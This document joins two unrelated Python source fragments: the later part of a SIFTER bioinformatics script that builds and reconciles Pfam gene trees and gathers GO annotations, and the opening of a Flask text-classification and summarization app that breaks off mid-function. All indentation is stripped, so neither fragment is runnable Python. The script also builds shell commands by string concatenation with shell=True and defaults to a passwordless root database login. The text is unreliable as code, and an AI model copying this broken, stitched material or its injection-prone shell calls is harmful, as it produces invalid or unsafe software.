subprocess.check_call("gunzip -c %s/%s.nw.gz > %s.%d"%(tree_folder,pfam_id,gene_tree_file,rand_id),shell=True)
tree = ete2.PhyloTree('%s.%d'%(gene_tree_file,rand_id), format=0)
tree.resolve_polytomy()
tree.write(format=0, outfile=txid_file+'.tmp.nw')
if os.path.exists('%s.%d'%(gene_tree_file,rand_id)):
subprocess.check_call("rm %s.%d"%(gene_tree_file,rand_id),shell=True)
Phylo.convert(txid_file+'.tmp.nw', 'newick', txid_file+'.tmp.xml', 'phyloxml')
treexml = PhyloXMLIO.read(open(txid_file+'.tmp.xml','r'))
tree = treexml[0]
treexml.attributes.pop('schemaLocation', None) # not supported by Forester
tree.rooted = True
my_ids=set([])
my_query_by_taxid={}
for leaf in tree.clade.find_clades(terminal=True):
up_name = leaf.name.split('/')[0]
tax_id,tax_name=find_tax_id_unip(up_name,db)
if tax_id not in all_species_txids:
if tax_id in merged_taxid.keys():
tax_id=merged_taxid[tax_id]
tax_name=find_tax_name(tax_id,db)
if tax_id in best_taxid_map.keys():
tax_id=best_taxid_map[tax_id]
tax_name=find_tax_name(tax_id,db)
else:
tax_id0=tax_id
tax_id,tax_name=find_best_taxid(tax_id,db)
if tax_id>0:
best_taxid_map[tax_id0]=tax_id
if tax_id<0:
if (-tax_id) in merged_taxid.keys():
tax_id=merged_taxid[-tax_id]
tax_name=find_tax_name(tax_id,db)
if tax_id in my_query_by_taxid:
my_query_by_taxid[tax_id].append(up_name)
else:
my_query_by_taxid[tax_id]=[up_name]
my_ids.add(tax_id)
my_tax_id = PhyloXML.Id(tax_id, provider='ncbi_taxonomy')
taxon=PhyloXML.Taxonomy(id=my_tax_id)
taxon.scientific_name = tax_name
leaf._set_taxonomy(taxon)
PhyloXMLIO.write(treexml, open(txid_file,'w'))
os.system('rm '+txid_file+'.tmp.nw')
os.system('rm '+txid_file+'.tmp.xml')
print "Taxid file done for: %s"%pfam_id
existing_ids=list(set(my_ids)&set(all_species_txids))
existing_genes=[g for txid in my_query_by_taxid.keys() for g in my_query_by_taxid[txid] if txid in existing_ids]
pickle.dump({'pfam_id':pfam_id,'existing_ids':existing_ids,'existing_genes':existing_genes}, open(rec_tag+'ids.pickle', 'wb'))
print "Pickle file done for: %s"%pfam_id
if os.path.exists(reconciled_file):
os.system('rm '+reconciled_file)
os.system("java -Xmx4g -cp %s/forester_1038.jar org.forester.application.gsdi -g %s %s/ncbi_2_fixed.xml %s"%(lib_path, txid_file, species_tree_data_path, reconciled_file))
if os.path.exists(reconciled_file):
if os.path.exists(reconciled_file+'.gz'):
subprocess.check_call("rm %s.gz"%(reconciled_file),shell=True)
subprocess.check_call("gzip %s"%(reconciled_file),shell=True)
os.system('rm '+rec_tag+'reconciled_species_tree_used.xml')
os.system('rm '+rec_tag+'reconciled_gsdi_log.txt')
os.system('rm '+txid_file)
print "Reconciliation file done for: %s"%pfam_id
def update_hmmer_alignment(sequences, orig_alignment, hmm,tmpf):
#tmpf = tempfile.NamedTemporaryFile(delete=False,
# suffix='.sto')
tmpf_o=open(tmpf,'w')
SeqIO.write(sequences, tmpf_o, "fasta")
tmpf_o.close()
pfam_hmm_align = PfamHMMERAlign()
# Make call and do initial parsing of results into format for ProteinInformation retrievers.
pfam_hmm_align.setup_caller(executable_locations = {
'hmmpress': path_to_hmmpress,
'hmmalign': path_to_hmmalign
},
params={
'hmm_file': hmm,
'orig_alignment': orig_alignment,
'query_sequences_fasta_file': tmpf
})
pfam_hmm_align.call()
pfam_hmm_align.parse_results()
return pfam_hmm_align.parsed_results
def pplacer_call(pplacer_package, aln_file, jplace_output_file):
pplacer = PplacerWrapper()
# Make call and do initial parsing of results into format for ProteinInformation retrievers.
pplacer.setup_caller(executable_locations = {
'pplacer': path_to_pplacer
},
params={
'package_location': pplacer_package,
'orig_alignment': aln_file,
'jplace_output_file': jplace_output_file
})
pplacer.call()
pplacer.parse_results()
return pplacer.parsed_results
def guppy_tree(jplace_file, tree_output_file):
guppy = GuppyWrapper()
guppy.setup_caller(executable_locations = {
'guppy': path_to_guppy
},
params={
'jplace_file': jplace_file,
'tree_output_file': tree_output_file
})
guppy.call()
guppy.parse_results()
return guppy.parsed_results
def hmm_build(hmmbuild_executable_loc,
sequence_file,
output_file):
'''
Calls hmmbuild
'''
cmd = hmmbuild_executable_loc \
+ " " + output_file \
+ " " + sequence_file
raw_data = subprocess.check_call(cmd, shell=True)
def taxit_create(taxit_executable_loc,
aln_fasta,
hmm_file,
tree_file,
tree_stats,
pfam_acc,
output_location,
aln_stockholm):
'''
Calls taxit
'''
#taxit create --clobber --aln-fasta ./PF14424.dedup.fasta --profile ./PF14424.wholefam.hmm --tree-file ./PF14424.dedup.nh --locus PF14424 --package-name PF14424.pplacer
cmd = taxit_executable_loc \
+ " create --clobber" \
+ " --aln-fasta " + aln_fasta \
+ " --profile " + hmm_file \
+ " --tree-file " + tree_file \
+ " --tree-stats " + tree_stats \
+ " --locus " + pfam_acc \
+ " --package-name " + output_location
raw_data = subprocess.check_call(cmd, shell=True)
input_handle = open(aln_fasta, "rU")
output_handle = open(aln_stockholm, "w")
alignments = AlignIO.parse(input_handle, "fasta")
AlignIO.write(alignments, output_handle, "stockholm")
output_handle.close()
input_handle.close()
def add_pplaced(pfam_id):
if pfam_id in pplacer_queries.keys():
print "Running PPlacer for: %s"%pfam_id
pplace_log=pplacer_folder+'/%s_pplace_log.txt'%pfam_id
Already_placed=[]
if os.path.exists(pplace_log):
with open(pplace_log, "r") as myfile:
for line in myfile:
line=line.strip()
if not line:
continue
line=line.split('\t')
if not len(line)==2:
continue
Already_placed.extend(line[1].split(','))
Sequnces=[]
p_ids=[]
for new_gene in pplacer_queries[pfam_id]:
p_id = new_gene['pplacer_id']
if p_id in Already_placed:
continue
p_ids.append(p_id)
p_seq = gene_seq[new_gene['id']][(new_gene['seq_start']-1):new_gene['seq_end']]
Sequnces.append(SeqRecord(p_seq, id=p_id))
if not p_ids:
print "All %s domains for family %s have already been pplaced."%(len(Already_placed),pfam_id)
return
rand_id_1=random.randint(1000000,9999999)
rand_id_2=random.randint(1000000,9999999)
rand_id_3=random.randint(1000000,9999999)
subprocess.check_call("gunzip -c %s/%s.log.gz > %s/%s.log.%d"%(tree_folder,pfam_id,tree_folder,pfam_id,rand_id_1),shell=True)
subprocess.check_call("gunzip -c %s/%s.nw.gz > %s/%s.nw.%d"%(tree_folder,pfam_id,tree_folder,pfam_id,rand_id_2),shell=True)
subprocess.check_call("gunzip -c %s/%s.fasta.gz > %s/%s.fasta.%d"%(alignment_folder,pfam_id,alignment_folder,pfam_id,rand_id_3),shell=True)
AlignIO.convert("%s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3),"fasta","%s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3),"stockholm")
hmm_build(hmmbuild_executable_loc=path_to_hmmbuild,
sequence_file='%s/%s.sth.%d'%(alignment_folder,pfam_id,rand_id_3),
output_file='%s/%s.hmm'%(pplacer_folder,pfam_id))
taxit_create(taxit_executable_loc=path_to_taxit,
aln_fasta='%s/%s.fasta.%d'%(alignment_folder,pfam_id,rand_id_3),
hmm_file='%s/%s.hmm'%(pplacer_folder,pfam_id),
tree_file='%s/%s.nw.%d'%(tree_folder,pfam_id,rand_id_2),
tree_stats='%s/%s.log.%d'%(tree_folder,pfam_id,rand_id_1),
pfam_acc=pfam_id,
output_location='%s/%s_pplacer'%(pplacer_folder,pfam_id),
aln_stockholm='%s/%s_pplacer/%s.sto.%d'%(pplacer_folder,pfam_id,pfam_id,rand_id_3),
)
if os.path.exists("%s/%s.log.%d"%(tree_folder,pfam_id,rand_id_1)):
subprocess.check_call("rm %s/%s.log.%d"%(tree_folder,pfam_id,rand_id_1),shell=True)
if os.path.exists("%s/%s.nw.%d"%(tree_folder,pfam_id,rand_id_2)):
subprocess.check_call("rm %s/%s.nw.%d"%(tree_folder,pfam_id,rand_id_2),shell=True)
if os.path.exists("%s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3)):
subprocess.check_call("rm %s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3),shell=True)
if os.path.exists("%s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3)):
subprocess.check_call("rm %s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3),shell=True)
output_prefix = '%s/%s_pplaced'%(pplacer_folder,pfam_id)
updated_aln = output_prefix + '.sto'
jplace_output_file = output_prefix + '.jplace'
tree_output_file = output_prefix + '.tre'
sequence_file='%s/%s.sth'%(alignment_folder,pfam_id)
aln_fasta='%s/%s.fasta'%(alignment_folder,pfam_id)
tree_file='%s/%s.nw'%(tree_folder,pfam_id)
pplacer_pkg_dir ='%s/%s_pplacer'%(pplacer_folder,pfam_id)
pplacer_pkg_hmm = '%s/%s.hmm'%(pplacer_pkg_dir,pfam_id)
pplacer_pkg_aln = '%s/%s.sto.%d'%(pplacer_pkg_dir,pfam_id,rand_id_3)
tmpf='%s/%s.tmpf'%(pplacer_pkg_dir,pfam_id)
# Update alignment to include the query sequence for the hypothetical domain.
aln_res = update_hmmer_alignment(Sequnces,
orig_alignment=pplacer_pkg_aln,
hmm=pplacer_pkg_hmm,tmpf=tmpf)
aln_out = open(updated_aln,'w')
AlignIO.write(aln_res[0], aln_out, 'stockholm')
aln_out.close()
# Call pplacer to generate placements onto the tree.
pplaced = pplacer_call(pplacer_package=pplacer_pkg_dir,
aln_file=updated_aln,
jplace_output_file=jplace_output_file)
# Use the "guppy" tool to generate the best-placement tree with query as a leaf.
gt = guppy_tree(jplace_file=jplace_output_file,
tree_output_file=tree_output_file)
#Phylo.convert(tree_output_file, 'newick', tree_output_file_xml, 'phyloxml')
os.system('rm -rf %s'%(pplacer_pkg_dir))
os.system('rm %s/%s.hmm'%(pplacer_folder,pfam_id))
os.system('rm %s/%s_pplaced.jplace'%(pplacer_folder,pfam_id))
os.system('mv %s %s'%(updated_aln,sequence_file))
AlignIO.convert(sequence_file,"stockholm",aln_fasta,"fasta")
if os.path.exists(aln_fasta+'.gz'):
subprocess.check_call("rm %s.gz"%(aln_fasta),shell=True)
subprocess.check_call("gzip %s"%(aln_fasta),shell=True)
cmd='mv %s %s'%(tree_output_file,tree_file)
os.system(cmd)
if os.path.exists(tree_file+'.gz'):
subprocess.check_call("rm %s.gz"%(tree_file),shell=True)
subprocess.check_call("gzip %s"%(tree_file),shell=True)
with open(pplace_log, "a") as myfile:
myfile.write("%s\t%s\n"%(my_sequence_file,','.join(p_ids)))
def process_tree(pfam_id,db):
align_file = alignment_folder+'/%s'%pfam_id
reconciled_fname = reconciled_folder+'/%s'%pfam_id
if (os.path.isfile(align_file+".fasta.gz")): #if you have an alignment file...
if not(os.path.isfile(reconciled_fname+"_reconciled.xml.gz")) or (pplacer_flag==1):
print "Process Tree for", pfam_id, "with", tree_sizes[pfam_id],"leaves"
# make a gene tree
if not(os.path.isfile("%s/%s.nw.gz"%(tree_folder,pfam_id))): #make a tree based on the alignment
print "Running FastTree for: %s"%pfam_id
rand_id_1=random.randint(1000000,9999999)
subprocess.check_call("gunzip -c %s.fasta.gz > %s.fasta.%d"%(align_file,align_file,rand_id_1),shell=True)
subprocess.check_call(lib_path + "/FastTree -log %s/%s.log %s/%s.fasta.%d > %s/%s.nw"%(tree_folder,pfam_id,alignment_folder,pfam_id,rand_id_1,tree_folder,pfam_id),shell=True);
if os.path.exists("%s.fasta.%d"%(align_file,rand_id_1)):
subprocess.check_call("rm %s.fasta.%d"%(align_file,rand_id_1),shell=True)
if os.path.exists('%s/%s.log.gz'%(tree_folder,pfam_id)):
subprocess.check_call("rm %s/%s.log.gz"%(tree_folder,pfam_id),shell=True)
if os.path.exists('%s/%s.nw.gz'%(tree_folder,pfam_id)):
subprocess.check_call("rm %s/%s.nw.gz"%(tree_folder,pfam_id),shell=True)
subprocess.check_call("gzip %s/%s.log"%(tree_folder,pfam_id),shell=True)
subprocess.check_call("gzip %s/%s.nw"%(tree_folder,pfam_id),shell=True)
if pplacer_flag:
pplaced_file = add_pplaced(pfam_id)
gene_tree_file = tree_folder+ '/%s.nw'%(pfam_id)
reconciled_file='%s/%s_reconciled.xml'%(reconciled_folder,pfam_id)
rec_tag='%s/%s_'%(reconciled_folder,pfam_id)
if not(os.path.isfile(reconciled_file+'.gz')) or (pplacer_flag==1):
reconcile_tree(gene_tree_file, reconciled_file, rec_tag, pfam_id,db)
return pfam_id
def get_goa_annotations_for_pfam_acc_new(domain_acc, evidence_constraints_all,db):
sql="""SELECT
goa_db.term_id as acc,
goa_db.evidence_code as code,
pfamseq.pfamseq_acc,
pfamseq.pfamseq_id
FROM goa_db
INNER JOIN pfamseq on (goa_db.uniprot_id=pfamseq.pfamseq_acc)
INNER JOIN pfamA_reg_full_significant on (pfamA_reg_full_significant.auto_pfamseq=pfamseq.auto_pfamseq)
INNER JOIN pfamA on (pfamA.auto_pfamA=pfamA_reg_full_significant.auto_pfamA)
WHERE
pfamA.pfamA_acc='%s'
AND goa_db.term_type = 'F'
AND goa_db.evidence_code in ('%s')
"""%(domain_acc, "','".join(evidence_constraints_all))
seq_anns = msql(sql, db)
return seq_anns
def parse_goa_pfam_annots(seq_anns):
anns = {}
seq_lookup = {}
for a in seq_anns:
pid = a['pfamseq_acc']
seq_lookup[a['pfamseq_acc']] = a['pfamseq_id']
if pid not in anns:
anns[pid] = []
anns[pid].append(a)
return anns, seq_lookup
def write_goa_anns_to_pli(evidence_file,goa_anns, fam_id, seq_lookup):
'''
This converts the database rows to B. Engelhardt's arbitrary evidence XML foramt.
Input looks like:
{'A2VE79': [{'acc': 'GO:0000287',
'code': 'ISS',
'full_name': 'Diphosphoinositol polyphosphate phosphohydrolase 1',
'genus': 'Bos',
'is_not': 0L,
'name': 'magnesium ion binding',
'species': 'taurus',
'symbol': 'NUDT3',
'xref_dbname': 'UniProtKB',
'xref_key': 'A2VE79'},
{'acc': 'GO:0008486',
'code': 'ISS',
'full_name': 'Diphosphoinositol polyphosphate phosphohydrolase 1',
'genus': 'Bos',
'is_not': 0L,
'name': 'diphosphoinositol-polyphosphate diphosphatase activity',
'species': 'taurus',
'symbol': 'NUDT3',
'xref_dbname': 'UniProtKB',
'xref_key': 'A2VE79'},
...
'''
f = open(evidence_file, 'w')
f.write("<?xml version=\"1.0\"?>\n<Family>\n")
f.write(" <FamilyID>%s</FamilyID>\n"%fam_id)
for p_id, anns in goa_anns.iteritems():
f.write(" <Protein>\n")
f.write(" <ProteinName>%s</ProteinName>\n"%seq_lookup[p_id])
f.write(" <ProteinNumber>%s</ProteinNumber>\n"%p_id)
go_str = ''
moc_str = ''
for i,a in enumerate(anns):
go_str += a['acc'][3:]
moc_str += a['code']
if i < len(anns)-1:
go_str += ', '
moc_str += ', '
f.write(" <GONumber>%s</GONumber>\n"%('['+go_str+']'))
f.write(" <MOC>%s</MOC>\n"%('['+moc_str+']'))
f.write(" </Protein>\n")
f.write("</Family>\n")
f.close()
# Get all evidence and then write each to file.
def get_evidence(p,my_db):
evidence_file = evidence_folder+'/%s.pli'%p
if not(os.path.isfile(evidence_file+'.gz')):
evidence_pickle_file = evidence_folder+'/%s.pickle'%p
print "Retrieving goa annotations for %s..."%p
seq_anns = get_goa_annotations_for_pfam_acc_new(domain_acc=p, evidence_constraints_all=evidence_constraints_all,db=my_db)
anns, seq_lookup = parse_goa_pfam_annots(seq_anns=seq_anns)
print "got %i results."%len(anns)
id_information = pickle.load(open(reconciled_folder+'/%s_ids.pickle'%p, 'rb'))
miss_flag=0
del_anns=[]
for gene,ev in anns.iteritems():
if ev[0]['pfamseq_id'] not in id_information['existing_genes']:
miss_flag=1
del_anns.append(gene)
continue
if miss_flag==1:
for gene in del_anns:
anns.pop(gene)
write_goa_anns_to_pli(evidence_file,anns, p, seq_lookup)
pickle.dump([evidence_file,anns, p, seq_lookup], open(evidence_pickle_file, 'wb'))
if os.path.exists(evidence_file):
if os.path.exists(evidence_file+'.gz'):
subprocess.check_call("rm %s.gz"%(evidence_file),shell=True)
subprocess.check_call("gzip %s"%(evidence_file),shell=True)
if os.path.exists(evidence_pickle_file):
if os.path.exists(evidence_pickle_file+'.gz'):
subprocess.check_call("rm %s.gz"%(evidence_pickle_file),shell=True)
subprocess.check_call("gzip %s"%(evidence_pickle_file),shell=True)
print "Wrote evidence to %s"%evidence_file
def gather_for_each_family(pfam_id,my_db):
align_file = alignment_folder+'/%s'%pfam_id
reconciled_fname = reconciled_folder+'/%s'%pfam_id
evidence_file = evidence_folder+'/%s.pli'%pfam_id
evidence_pickle_file = evidence_folder+'/%s.pickle'%pfam_id
queries_to_process=[]
if not(os.path.isfile(align_file+".fasta.gz")):
get_alignment(pfam_id,my_db)
if (os.path.isfile(align_file+".fasta.gz")): #if you have an alignment file...
if not(os.path.isfile(reconciled_fname+"_reconciled.xml.gz")) or (pplacer_flag==1):
process_tree(pfam_id,my_db)
if not(os.path.isfile(evidence_pickle_file+'.gz')):
get_evidence(pfam_id,my_db)
class ProcessingThread_gather(threading.Thread):
"""Thread for running sequence alignments on a given input homolog cluster."""
def __init__(self, thread_queue,db):
threading.Thread.__init__(self)
self.thread_queue = thread_queue
self.db=db
def thread_operation(self, thread_data):
pfam_id = thread_data
my_db=self.db
try:
print "--------------------------------------------------"
print "Gathering family data for %s"%pfam_id
# Input evidence
gather_for_each_family(pfam_id,my_db)
print "Family data files gathered for %s"%pfam_id
print "---------------"
except Exception as e:
print >> sys.stderr, "Error gathering family data for %s"%pfam_id
print >> sys.stderr, "Error: ", e
exit(1)
def run(self):
while True:
# Spawn a thread with data from the queue
thread_data = self.thread_queue.get()
# Run thread's function on the data
try:
self.thread_operation(thread_data)
except:
print "Unexpected thread error:", sys.exc_info()[0]
print "Thread data:", thread_data
# Send signal that this task finished
self.thread_queue.task_done()
if __name__=="__main__":
# Initialization
params_mysql = {\
'db_address': 'localhost',
'db_username': 'root',
'db_password': '',
'db_name': 'sifter_db'
}
evidence_constraints_all = [
# Experimental
'EXP', # Experiment
'IDA', # Direct Assay
'IPI', # Physical Interaction
'IMP', # Mutant Phenotype
'IGI', # Genetic Interaction
'IEP', # Expression Pattern
# Author Statements
'TAS', # Traceable Author Statement
'NAS', # Non-traceable Author Statement
# Computational Analysis Evidence Codes
'ISS', # Sequence/Structural Similarity
'ISO', # Sequence Orthology
'ISA', # Sequence Alignment
'ISM', # Sequence Model
'IGC', # Genomic Context
'IBA', # Biological aspect of ancestor
'IBD', # Biological aspect of descendant
'IKR', # Key Residues
'IRD', # Rapid Divergence
'RCA', # Reviews Computational Analysis
# Curator Statement
'IC', # Curator
'ND', # No biological data available
# Automatically assigned
'IEA', # Electronic Annotation
# Obsolete
'NR' # Not recorded
]
main_dir=os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
species_tree_data_path = main_dir+'/data/species_tree_data'
lib_path=main_dir+'/lib'
path_to_hmmbuild='hmmbuild'
path_to_hmmpress='hmmpress'
path_to_hmmalign='hmmalign'
path_to_taxit='taxit'
path_to_pplacer=lib_path+'/pplacer-v1.1/pplacer'
path_to_guppy=lib_path+'/pplacer-v1.1/guppy'
#???
best_taxid_map_file=species_tree_data_path+'/best_taxid_map.pickle'
#???
merged_taxid_file = species_tree_data_path+'/merged.dmp'
num_threads=4
pplacer_flag = 0
my_sequence_file=''
hit_file=''
my_taxid=''
all_fams=0
pfams=[]
input_file=''
# Check for options
opts, args = getopt.getopt(sys.argv[1:], "hi:f:n:A",['dbname=','dbpass=','dbuser=','dbaddr=','seq_file=','hit_file=','taxid='])
if len(args) != 1:
usage()
sys.exit()
choices=[]
new_genome_choices=[]
if len(opts)>0:
for o, a in opts:
if o == "-f":
splited =a.strip().split(',')
pfams=list(set([w for w in splited if w]))
choices.append('f')
elif o == "-i":
input_file = a
choices.append('i')
elif o == "-A":
all_fams = 1
choices.append('A')
elif o == "--seq_file":
my_sequence_file = a
new_genome_choices.append('seq_file')
elif o == "--hit_file":
hit_file = a
new_genome_choices.append('hit_file')
elif o == "--taxid":
my_taxid = a
new_genome_choices.append('taxid')
elif o == "-n":
num_threads=int(a)
elif o == "--dbname":
params_mysql['db_name']= a
elif o == "--dbaddr":
params_mysql['db_address']= a
elif o == "--dbpass":
params_mysql['db_password']= a
elif o == "--dbuser":
params_mysql['db_username']= a
else:
usage()
sys.exit()
if len(new_genome_choices)>0 and len(new_genome_choices)<3:
print "\nERROR: To gather data for a new genome, please enter information for all '--seq_file', '--hit_file', and '--taxid' options.\n"
sys.exit()
if my_sequence_file:
if not os.path.exists(my_sequence_file):
print "\nERROR: No sequence file at %s.\n"%my_sequence_file
sys.exit()
if hit_file:
if not os.path.exists(hit_file):
print "\nERROR: No Pfam hit file at %s.\n"%hit_file
sys.exit()
if len(choices)==0:
print "\nERROR: No pfam families are entered."
print "Please use one of the -f or -i or -A options to enter your query.\n"
sys.exit()
elif len(choices)>1:
print "\nERROR: Please use ONLY one of the -f or -i or -A options to enter your query.\n"
sys.exit()
if (len(new_genome_choices)==0) and ('A' in choices):
print "\nERROR: Option -A can only be used when gather data for a novel species.\n"
sys.exit()
output_families_data_path=args[0]
if not os.path.exists(output_families_data_path):
os.mkdir(output_families_data_path)
evidence_folder=output_families_data_path+'/annotations'
if not os.path.exists(evidence_folder):
os.mkdir(evidence_folder)
alignment_folder=output_families_data_path+'/alignments'
if not os.path.exists(alignment_folder):
os.mkdir(alignment_folder)
reconciled_folder=output_families_data_path+'/reconciled_trees'
if not os.path.exists(reconciled_folder):
os.mkdir(reconciled_folder)
tree_folder=reconciled_folder+'/trees'
if not os.path.exists(tree_folder):
os.mkdir(tree_folder)
db_mysql = MySQLdb.connect(host=params_mysql['db_address'],
user=params_mysql['db_username'],
passwd=params_mysql['db_password'],
db=params_mysql['db_name'],
cursorclass=MySQLdb.cursors.DictCursor)
print "\n\n--------------Reading the input famiy information------------"
if pfams:
print "Run SIFTER for %s Pfam Families"%len(pfams)
elif input_file:
if not os.path.exists(input_file):
print "\nERROR: No file exists at %s\n"%input_file
sys.exit()
f = open(input_file, 'r')
a=f.read()
splited =re.split(' |,|;|\n',a.strip())
pfams=list(set([w for w in splited if w]))
print "Run SIFTER for %s Pfam Families"%len(pfams)
if (not pfams) and (len(new_genome_choices)==0) :
print "\nERROR: No pfam families are entered.\n"
sys.exit()
if len(new_genome_choices)==3:
print "\n\n--------------Reading the Pfam hit file------------"
gene_seq,pplacer_queries=find_pfam_hits_from_file(hit_file,my_sequence_file)
if not pfams:
pfams=pplacer_queries.keys()
print "We will run on All %s Pfam Families of your novel species."%len(pfams)
pfds=get_pfds(pfams,db_mysql)
tree_sizes = {}
for p in pfds.keys():
tree_sizes[p] = pfds[p]['num_full']
sorted_fams = sorted(pfds.keys(), key=lambda k:pfds[k]['num_full'])
print "Number of families to process:" ,len(sorted_fams)
print "\n\n--------------Reading the species tree data------------"
# ##3-Extract tree information for each Pfam family
all_species_txids_pickled=species_tree_data_path + '/all_species_txids.pickle'
all_species_txids=pickle.load(open(all_species_txids_pickled))
orig_sp_tree_0 = ete2.PhyloTree(species_tree_data_path + '/ncbi.nw', format=0)
zero_taxids={'HUMAN':9606, '9CAUD':70702, 'BABHY':37552, 'ARATH':3702, '9STAP':1077965, 'SALTM':99287, '9MYCO':512402, '9RETR':31697,
'BEABA':176275, '9EURO':1194637, '9BACE':871324, '9CAEN':1181719 }
best_taxid_map=pickle.load(open(best_taxid_map_file,'r'))
#???
merged_f=open(merged_taxid_file,'r')
merged_taxid={}
for line in merged_f.readlines():
my_line=line.split('\t')
merged_taxid[int(my_line[0])]=int(my_line[2])
merged_f.close()
print "\n------------Gather the necessary data for families-------------"
my_taxid0=my_taxid
if my_taxid0:
success=1
if my_taxid0 not in all_species_txids:
success=0
if my_taxid0 in merged_taxid.keys():
my_taxid0=merged_taxid[my_taxid0]
tax_name=find_tax_name(my_taxid0,db_mysql)
if my_taxid0 in best_taxid_map.keys():
my_taxid0=best_taxid_map[my_taxid0]
tax_name=find_tax_name(my_taxid0,db_mysql)
success=1
else:
tax_id0=my_taxid0
my_taxid0,tax_name=find_best_taxid(my_taxid0,db_mysql)
if my_taxid0>0:
best_taxid_map[tax_id0]=my_taxid0
success=1
if success==0:
print "\nThe taxonomy ID you entered does not exist in our database, please enter the correct NCBI taxonomy ID for your species. You may also enter the NCBI taxonomy ID for a close species to your query that exist in our dataset.%s\n"
sys.exit()
else:
pplacer_flag=1
pplacer_folder=reconciled_folder+'/pplaced'
if not os.path.exists(pplacer_folder):
os.mkdir(pplacer_folder)
pfams_to_process = []
for i,pfam_id in enumerate(sorted_fams):
if pplacer_flag==1:
if pfam_id not in pplacer_queries:
print "Your queried species does not have a gene in family %s)"%(pfam_id)
print "We will Skip this family"
print "---------------"
continue
pfams_to_process.append(pfam_id)
thread_queue = Queue.Queue()
for i in range(num_threads):
my_db=MySQLdb.connect(host=params_mysql['db_address'],
user=params_mysql['db_username'],
passwd=params_mysql['db_password'],
db=params_mysql['db_name'],
cursorclass=MySQLdb.cursors.DictCursor)
t = ProcessingThread_gather(thread_queue,my_db)
t.setDaemon(True)
t.start()
for pfam_id in pfams_to_process:
thread_queue.put(item=pfam_id, block=False)
# Wait on the queue until everything has been processed
thread_queue.join()
errors=0
for pfam_id in pfams_to_process:
evidence_pickle_file = output_families_data_path+'/annotations/%s.pickle'%pfam_id
if not (os.path.isfile(evidence_pickle_file+'.gz')):
errors+=1
if errors==0:
print "-------------------Data gadering is Done----------------------"
print "\nNext step is to run 'sifter_prepare.py' to prepares necessary files for your query to run SIFTER on."
else:
print "\nData files are gatherd for %d out of %d families. (%s missed due to errors)"%(len(pfams_to_process)-errors,len(pfams_to_process),errors)
|
########
# _________________
# | |
# | Package Upload |
# |_________________|
#
########
# System packages
import json
import os
import time
import sys
from os import listdir
from os.path import isfile, join
# plotting packages
import torch
import numpy as np
import pandas as pd
import tensorflow as tf
import networkx as nx
import math, scipy, copy, re
from bs4 import BeautifulSoup
import cgi
# used in the count of words
import string
# NLTK toolkit
import nltk
import nltk.data # natural language tool kit
# for tokenizing sentences according by the words
from nltk.tokenize import WhitespaceTokenizer
from nltk.tokenize import sent_tokenize, word_tokenize # $ pip install nltk
from nltk.corpus import stopwords
nltk.download('punkt')
nltk.download('stopwords')
from nltk.cluster.util import cosine_distance
# Machine Learning Packages
import joblib
from sklearn import model_selection, preprocessing, metrics
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import train_test_split
# additional python files
import model
import sample
import encoder
#import forms
#from forms import ContactForm
from flask import render_template, jsonify, request, flash
from writrly import application
#from flask_mail import Message, Mail
###############################
# ___________________________________
# | |
# | Checks whether GPU is available |
# |___________________________________|
#
################################
def GPU_avail():
# Checking if GPU is available
work_with_gpu = torch.cuda.is_available()
if(work_with_gpu):
return (" Program is using the GPU!")
else:
return ('No GPU available. Using CPU.')
################################
# _______________________
# | |
# | Code for Classifier |
# |_______________________|
#
################################
## cleaning text
REPLACE_BY_SPACE_RE = re.compile('[/(){}\[\]\|@,;]')
BAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')
STOPWORDS = set(stopwords.words('english'))
def clean_text(text):
"""
text: a string
return: modified initial string
"""
text = BeautifulSoup(text, "lxml").text # HTML decoding
text = text.lower() # lowercase text
text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text
text = BAD_SYMBOLS_RE.sub('', text) # delete symbols which are in BAD_SYMBOLS_RE from text
text = ' '.join(word for word in text.split() if word not in STOPWORDS) # delete stopwors from text
return text
## key for classifier
class_key = ['Business',
'Education',
'Entertainment',
'Health',
'Ideas',
'International',
'Politics',
'Science',
'Short Story',
'Technology']
# load in csv file
masterDF = pd.read_csv('./writrly/static/data/master_df.csv')
#load model from file
file_model = joblib.load("./writrly/static/data/logreg_wordcount_model.pkl")
# clean essay element
essay = masterDF['essay']
essay = [clean_text(elem) for elem in essay]
masterDF['essay'] = essay
# create a count vectorizer object and fit it to essa
count_vect = CountVectorizer(analyzer='word', token_pattern=r'\w{1,}')
count_vect.fit(masterDF['essay'])
# predicts class of string or file
def predict_class(free_x):
#clean text
free_x = clean_text(free_x)
free_vect = count_vect.transform([free_x])
prediction = class_key[file_model.predict(free_vect)[0]]
return prediction, max(file_model.predict_proba(free_vect)[0])
def predict_class_file(filename):
with open(filename, 'r') as file:
free_x = file.read().replace('\n', '')
# clean text
free_x = clean_text(free_x)
free_vect = count_vect.transform([free_x])
prediction = class_key[file_model.predict(free_vect)[0]]
return prediction, max(file_model.predict_proba(free_vect)[0])
################################
# _____________________________
# | |
# | Code for Summary Extraction |
# |_____________________________|
#
################################
def sentence_similarity(sent1, sent2, stopwords=None):
if stopwords is None:
stopwords = []
sent1 = [w.lower() for w in clean_text(sent1)]
sent2 = [w.lower() for w in clean_text(sent2)]
all_words = list(set(sent1 + sent2))
vector1 = [0] * len(all_words)
vector2 = [0] * len(all_words)
# build the vector for the first sentence
for w in sent1:
if w in stopwords:
continue
vector1[all_words.index(w)] += 1
# build the vector for the second sentence
for w in sent2:
if w in stopwords:
continue
vector2[all_words.index(w)] += 1
return 1 - cosine_distance(vector1, vector2)
def build_similarity_matrix(sentences, stop_words):
# Create an empty similarity matrix
similarity_matrix = np.zeros((len(sentences), len(sentences)))
for idx1 in range(len(sentences)):
for idx2 in range(len(sentences)):
if idx1 == idx2: #ignore if both are same sentences
continue
similarity_matrix[idx1][idx2] = sentence_similarity(sentences[idx1], sentences[idx2], stop_words)
return similarity_matrix
def generate_summary_text(text, top_n):
stop_words = stopwords.words('english')
summarize_text = []
# Step 1 - Read text anc split it
sentences = sent_tokenize(text)
# Step 2 - Generate Similary Martix across sentences
